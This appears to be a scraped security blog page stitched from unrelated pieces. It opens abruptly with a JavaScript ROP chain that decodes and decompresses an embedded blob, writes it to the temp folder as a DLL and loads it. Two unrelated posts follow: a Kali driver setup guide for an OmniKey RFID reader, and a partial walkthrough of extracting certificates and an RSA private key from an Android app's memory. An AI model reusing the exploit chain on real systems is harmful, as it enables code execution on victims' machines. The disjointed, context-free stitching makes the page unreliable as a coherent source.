r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818033); //scratch_space + 0x33
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x446c7452);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818037); //scratch_space + 0x37
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x6d6f6365);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81803b); //scratch_space + 0x3b
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x73657270);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81803f); //scratch_space + 0x3f
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x66754273);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818043); //scratch_space + 0x43
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x726566);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x818047); //scratch_space + 0x47
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x73736377);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81804b); //scratch_space + 0x4b
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x41007274);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret


r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0240);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x538c1d); //xchg eax,edi/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc023c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x816e96); //ptr to "MSVCR90.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc022c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // Placeholder for ptr to LoadLibrary Handle

r+=getUnescape(moduleLoadAddr+0x818047); //scratch_space + 0x47 ("wcsstr")
r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {MSVCR90!wcsstr (7189752c)}
r+=getUnescape(moduleLoadAddr+0x5ec1a0); //pop ecx/pop ecx/ret
r+=getUnescape(0x41414141); // Placeholder for Ptr to "Module" (unicode)
r+=getUnescape(moduleLoadAddr+0x60a990); // "Module" (unicode)
r+=getUnescape(moduleLoadAddr+0x2df56d); //add eax, 0ch/ret ; Points to after "Module"

r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 0x5e
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret ; Copies the start of that string above to the scratchspace
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x81804e); //scratch_space + 0x4e
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(0x1010101);
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x817030); //pointer to "Crypt32.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc02ac);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret; ; Loads the address of "Crypt32.dll" to 4141 below

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // Placeholder for the address of "Crypt32.dll"

r+=getUnescape(moduleLoadAddr+0x818018); //scratch_space + 0x18 // Place holder in scratch space for handle of crypt32 from loadlibrary
r+=getUnescape(moduleLoadAddr+0x57c7ce); //xchg eax,ebp/ret

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 0x5e
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc033c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret ;

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0340);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0344);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret
r+=getUnescape(moduleLoadAddr+0x57c7ce); //xchg eax,ebp/ret ; sets ebp to attacker controlled data

r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {CRYPT32!CryptStringToBinaryA (756e1360)}
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x41414141); // Placeholder for ptr to base64 above
r+=getUnescape(0x42424242); // Placeholder for zeros above
r+=getUnescape(0x43434343); // place holder for 1 above
r+=getUnescape(moduleLoadAddr+0x818066); //scratch_space + 0x66
r+=getUnescape(moduleLoadAddr+0x81804e); //scratch_space + 0x4e
r+=getUnescape(moduleLoadAddr+0x818056); //scratch_space + 0x56
r+=getUnescape(moduleLoadAddr+0x81805a); //scratch_space + 0x5a

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0428);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret ; ecx = 2

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81804e); // scratch_space + 0x4e
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0438);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 5e
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc042c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x81802d); //ptr to string (ntdll)
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0418);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // place holder for above
r+=getUnescape(moduleLoadAddr+0x818033); //ptr to str "RtlDecompressBuffer"

r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {ntdll!RtlDecompressBuffer (77585001)}
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x41414141); // Place Holder for above - which is 2 (LZNT)
r+=getUnescape(0x44444444); // Place Holder for above - ptr to b64 blob
r+=getUnescape(0x1010101); // Place Holder for above - 01010101
r+=getUnescape(moduleLoadAddr+0x818066); //scratch_space + 66 - ptr to decoded blob
r+=getUnescape(0x43434343); // Place holder for above 00004a51
r+=getUnescape(moduleLoadAddr+0x818052); //scratch_space + 52 ptr to "756f7365"

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x816e96); //ptr to "MSVCR90.dll"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc047c);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // handle
r+=getUnescape(moduleLoadAddr+0x81800e); //ptr to "fwrite"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05ec);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret;
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret


r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x60a4fc); //ptr to Kernel32.dll
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc04e0);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f11d4); //Address to kernel32!GetProcAddressStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(0x41414141); // Handle
r+=getUnescape(moduleLoadAddr+0x818001); //ptr to GetTempPathA
r+=getUnescape(moduleLoadAddr+0x154a); //jmp eax {kernel32!GetTempPathA (769e8996)}
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x1010101); //
r+=getUnescape(moduleLoadAddr+0x818101); //scratch_space + 01; to be used to store the path

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x818101); //scratch_space + 01; path
r+=getUnescape(moduleLoadAddr+0x4f16f4); //add eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret ; is zero
r+=getUnescape(0x542e44); // is "D.T"
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x502076); //xor eax, eax/ret ;
r+=getUnescape(moduleLoadAddr+0x5d72b8); //inc eax/ret ;
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret ;

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05f8);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x818052); //scratch_space + 52
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05fc);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f165c); //65cf265c={MSVCR90!fopen (7188fe4a)}
r+=getUnescape(moduleLoadAddr+0x1dee7); //jmp [eax]
r+=getUnescape(moduleLoadAddr+0x5ec1a0); //pop ecx/pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x818101); //scratch_space + 01 ; Points to temppath+DLL name
r+=getUnescape(moduleLoadAddr+0x818015); //scratch_space + 15 ; points to "wb"
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret ;

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0600);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret;

r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc0614);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret ecx is ptr to 0

r+=getUnescape(moduleLoadAddr+0x5efb29); //pop ecx/ret
r+=getUnescape(moduleLoadAddr+0x81805e); //scratch_space + 5e;
r+=getUnescape(moduleLoadAddr+0x465f20); //mov eax,dword ptr [ecx]/ret
r+=getUnescape(moduleLoadAddr+0x508c23); //xchg eax,ecx/ret

r+=getUnescape(moduleLoadAddr+0x5ec230); //pop edi/ret
r+=getUnescape(0xcccc05f4);
r+=getUnescape(moduleLoadAddr+0x4225cc); //movsx edi,di/ret
r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(moduleLoadAddr+0x13ca8b); //add edi,esi/ret
r+=getUnescape(moduleLoadAddr+0x25e883); //push edi/pop eax/ret
r+=getUnescape(moduleLoadAddr+0x46d6ca); //mov [eax], ecx/ret

r+=getUnescape(0x42424242); // ptr to fwrite
r+=getUnescape(moduleLoadAddr+0x5012b3); //add esp,10h/ret
r+=getUnescape(0x43434343); // ptr to start of program
r+=getUnescape(0x44444444); // 1
r+=getUnescape(0x44444444); // 00008c00
r+=getUnescape(0x45454545); // file handle


r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1668); // ptr to fclose
r+=getUnescape(moduleLoadAddr+0x1dee7); // jmp dword ptr [eax]

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret - Useless?
r+=getUnescape(0x45454545);

r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f1214); //65cf2214={kernel32!LoadLibraryA (769d2864)}

r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret
r+=getUnescape(moduleLoadAddr+0x818101); //Loads D.T as a library
r+=getUnescape(moduleLoadAddr+0x51f5fd); //pop eax/ret
r+=getUnescape(moduleLoadAddr+0x5f10c0); // ptr to SleepStub
r+=getUnescape(moduleLoadAddr+0x4b1788); //call [eax]/ret

r+=getUnescape(moduleLoadAddr+0x17); //ret
r+=getUnescape(0x1010101);


r+=getUnescape(0x6f004d);
r+=getUnescape(0x750064);
r+=getUnescape(0x65006c);

ROP_ADD_ESP_4 = 0x20c709bb;
ROP_ADD_ESP_8 = 0x20d7c5ad;
ROP_ADD_ESP_10 = 0x20d022b3;
ROP_ADD_ESP_14 = 0x20cfa63f;
ROP_ADD_ESP_1C = 0x20cec3dd;
ROP_ADD_ESP_3C = 0x2080df51;
XCHG_EAX_ESP = 0x20d18753;
NOP = 0x20801017;
CLR_STACK = 0x20cea9bf;
STACK_PIVOT = 0x2089209e;




Using the OmniKey CardMan 5321/5325 in Kali Linux

By Brad Antoniewicz.

In a previous post on my old blog I detailed how to set up the OmniKey CardMan 5321 in Backtrack. It's surprising how often this topic comes up. Everyone wants to do RFID hax but HID makes life confusing because they haven't released a generic driver that can be incorporated into PCSC. So I finally had a chance to get my CardMan 5321 running in Kali and wanted to share the process via this quick blog post.

Driver Download

You'll need HID's Linux drivers to make this work. This may seem like a simple task, but the driver is not really obvious on the HID website. The CardMan 5321 product overview page has a link to the drivers download page, but rather than bringing you directly to the CardMan's drivers, it brings you to the page for every driver for every HID reader. The first one is for Linux, which I think is where people get caught up.

The file I downloaded was ifdokrfid_lnx_i686-2.10.0.1.tar.gz. Here's a screenshot of the download location (you have to do some scrolling to find it):



I didn't try the 64-bit version, so use with caution.

Driver Install

Once you've found the drivers, everything is just about the same as in my previous post. Decompress and install the drivers as detailed in the README:

root@kali:~# tar -zxf ifdokrfid_lnx_i686-2.10.0.1.tar.gz
root@kali:~# cd ifdokrfid_lnx_i686-2.10.0.1/
root@kali:~/ifdokrfid_lnx_i686-2.10.0.1# ./install

Installing HID Global OMNIKEY RFID Smartcard reader driver ...

PCSC-Lite found: /usr/sbin/pcscd
Copying ifdokrfid_lnx_i686-2.10.0.1.bundle to /usr/lib/pcsc/drivers ...

Installation finished!




Configuration

With the drivers installed, you just have to make sure that PCSC is set up to let the new drivers take over rather than its defaults. That can be accomplished with the script I wrote in the previous post. I put the script up on GitHub for ease of access:



Then just download and run it:
root@kali:~# wget https://raw.github.com/OpenSecurityResearch/cardman_install_fix/master/cardman_install_fix.sh
root@kali:~# chmod +x cardman_install_fix.sh
root@kali:~# ./cardman_install_fix.sh
pcscd: no process found
PCSC-Lite found: /usr/sbin/pcscd
Found drop dir: /usr/lib/pcsc/drivers
Backing up Info.plist
Line Numbers:
ProductID: 330
0x5321: 482
VendorID: 105
FriendlyName: 555
Offsets:
General: 152
VendorID: 257
FriendlyName: 707
Deleting all the lines!
-i 482 d
-i




Previous Errors

In the previous post some people were getting this error when running the script:
/root/cardman_install_fix.sh: line 20: syntax error in conditional expression: unexpected token `&'
/root/cardman_install_fix.sh: line 20: syntax error near `&a'
/root/cardman_install_fix.sh: line 20: `if [[ -n $LINE_PRODID && -n $LINE_0x5321 && -n $LINE_VEND && -n $LINE_FRIEND ]]; then'



This is likely a copy and paste issue - you just need to change the &amp;&amp; to && on line 20. But that shouldn't happen anymore because it's downloadable via GitHub.

Testing!

Now you should be able to get cardselect.py to recognize it once you start pcscd:

root@kali:~# pcscd
root@kali:~# cardselect.py -L
PCSC devices:
No: 0 OMNIKEY CardMan 5x21 00 00
No: 1 OMNIKEY CardMan 5x21 00 01



Enjoy!

Extracting RSAPrivateCrtKey and Certificates from an Android Process

By Gursev Singh Kalra.

An Android application that I assessed recently had extensive cryptographic controls to protect client-server communication and to secure its local storage. To top that, its source code was completely obfuscated. Combined, these two factors made the application a great candidate for reversing. In this blog I will detail the portion of work where I dumped X.509 certificates and constructed an RSA private key (RSAPrivateCrtKey) from the Android application's memory using the Eclipse Memory Analyzer Tool (MAT) and Java code.

Analyzing Android Memory with Eclipse MAT

Eclipse MAT is primarily a Java heap analyzer that has extensive usage beyond its primary purpose of identifying memory leaks. It can be used to identify and dump sensitive information in Android application memory, perform some memory forensics etc… If you are new to Android memory analysis, I recommend that you get intimate with this tool for its obvious benefits. The following articles can help you get started.



Okay, now back to our target application.

Locating the crypto material

As part of the reversing process I used dex2jar to decompile the application APK to Java files and started analyzing them. While following the application logic and reviewing its obfuscated code, I stumbled upon a Java file (com.pack.age.name.h.b.java) that contained instance variables of type SSLSocketFactory and X509TrustManager. Clearly, this class was performing important cryptographic operations with respect to client-server communication.

So I pivoted to this class to identify the source of its crypto material, and all attempts led me from one rabbit hole to another. I then decided to look directly at the application heap with Eclipse MAT. I launched the application and performed some operations to ensure that the application loaded the required crypto material, and then performed the following steps to create the HPROF file containing the application heap dump.

  1. Select the application from the list of running apps
  2. Select the “Show heap updates” option for the target application
  3. Select “Dump HPROF file” for analysis.
  4. Since I had the MAT plugin installed, ADT converted the Android memory dump to HPROF format and presented it for analysis. In case you do not have the MAT plugin, you will need to convert the generated dump to a MAT readable format with the hprof-conv utility that comes with ADT.


After opening the heap dump, I clicked on the “Dominator Tree” to view the object graph. Supplying the name of the class which had the SSLSocketFactory and X509TrustManager instance variables in the Regex area filtered out most of the unwanted stuff. I then navigated the object tree to identify the X.509 certificates and the RSAPrivateCrtKey, as shown below.



Dumping the certificates

The X.509 certificates were byte arrays of different lengths and extracting them turned out to be quick. I right clicked on the byte array -> navigated to Copy -> Save Value to File -> selected a location to save the file and clicked Finish. MAT indicates that the copy functionality allows you to write char[], String, StringBuffer and StringBuilder to a text file, but it handsomely handled the byte[] in the current context. Please note that the extension of the exported file was set to .der on the Windows system. The following screenshots will show you the steps followed and one extracted certificate.

First select the “Save Value to File” functionality for the byte[]:



Next save the file as certificate-1.der :



And now you can see the extracted Root CA certificate from the Android application:


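As a quick sanity check (my addition, not part of the original workflow), a few lines of Java can parse the exported blob and confirm it really is an X.509 certificate; the file name below is just the example used above:

import java.io.FileInputStream;
import java.security.cert.CertificateFactory;
import java.security.cert.X509Certificate;

public class VerifyExportedCert {
    public static void main(String[] args) throws Exception {
        // Parse the DER blob exported from MAT; an exception here means it isn't a valid certificate
        CertificateFactory cf = CertificateFactory.getInstance("X.509");
        try (FileInputStream in = new FileInputStream("certificate-1.der")) {
            X509Certificate cert = (X509Certificate) cf.generateCertificate(in);
            System.out.println("Subject: " + cert.getSubjectDN());
            System.out.println("Issuer:  " + cert.getIssuerDN());
        }
    }
}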

Extracting the RSAPrivateCrtKey

The second important component was the RSAPrivateCrtKey and extracting it was a little more involved, as we will see below. To summarize, the following steps were followed to retrieve the RSAPrivateCrtKey:

  1. Locate the components that make up the RSAPrivateCrtKeySpec
  2. Copy all the components and store them on the file system
  3. Compute positive BigInteger values from these components
  4. Construct the RSAPrivateCrtKeySpec from its components
  5. Use the RSAPrivateCrtKeySpec object to construct the RSAPrivateCrtKey
  6. Write the RSAPrivateCrtKey to the file system in PKCS8 format
  7. And optionally:
    1. Convert PKCS8 to PEM using OpenSSL
